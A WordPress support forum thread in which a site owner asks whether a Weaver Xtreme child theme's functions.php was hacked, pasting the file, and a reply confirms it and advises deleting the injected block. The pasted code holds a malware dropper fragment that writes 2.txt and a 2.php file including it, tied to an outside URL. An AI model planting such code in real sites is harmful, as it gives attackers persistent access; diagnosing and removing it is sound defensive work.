Home Forums Weaver Xtreme Theme Has My Xtreme-Child/Functions.php Been Hacked?

Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
  • #62297
    Weaver Xtreme Options – Plus ( 3.1.1 )
    All plugins on above site up to date at the time of writing this post.
    Recently on my site https://www.eldg.co.uk I had an error show up at top of the website that theĀ  Weaver-Xtreme-Child/Functions.php file had an error on line 2, on inspecting functions.php on line 2 had an unknown (To Me) URL “http://theflowerproject.co.uk/wp-content/themes/927/2.txt'”, there is no 927 folder on the server according to Filezilla. Also, two files have “appeared in the Weaver-Xtreme-Child folder named “2.php & 2.txt, I cannot access “2.txt file” as I apparently I do not have permission, even though I am the owner of the site and admin, I tried setting permissions via File Permissions but still no access.
    Firstly I ran a malware scan using Wordfence & Sucuri scanners which resulted in “No Threats” I then tried removing the offending URL and replacing it with my own http://www.eldg.co.uk, Result was my site broke, eventually go most of the website working again. I use IThemes Security.
    After altering the Functions.php file and breaking the site I had to do a restore from my server to recover the website.
    The site is working again without the error message but the suspicious Functions.php is still there along with the two suspect files 2.txt & 2.txt.
    Can anyone tell me how to clean the functions.php of the URL http://theflowerproject.co.uk.
    This is the file Functions.php:
    if(!file_exists(‘2.txt’)) file_put_contents(‘2.txt’,$x,FILE_APPEND);
    if(!file_exists(‘2.php’)) file_put_contents(‘2.php’,'<?php include(\’2.txt\’);’,FILE_APPEND);
    // Exit if accessed directly
    if ( !defined( ‘ABSPATH’ ) ) exit;
    // AUTO GENERATED – Do not modify or remove comment markers above or below:

    That absolutely looks like a hack.

    Given the mentioned files don’t seem to exist, there is probably no other damage.

    You should be able to simply delete the first group of <?php …. ?> code to remove the hack.

    How your site was hacked is another question, and you might be susceptible to additional hacking.

Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.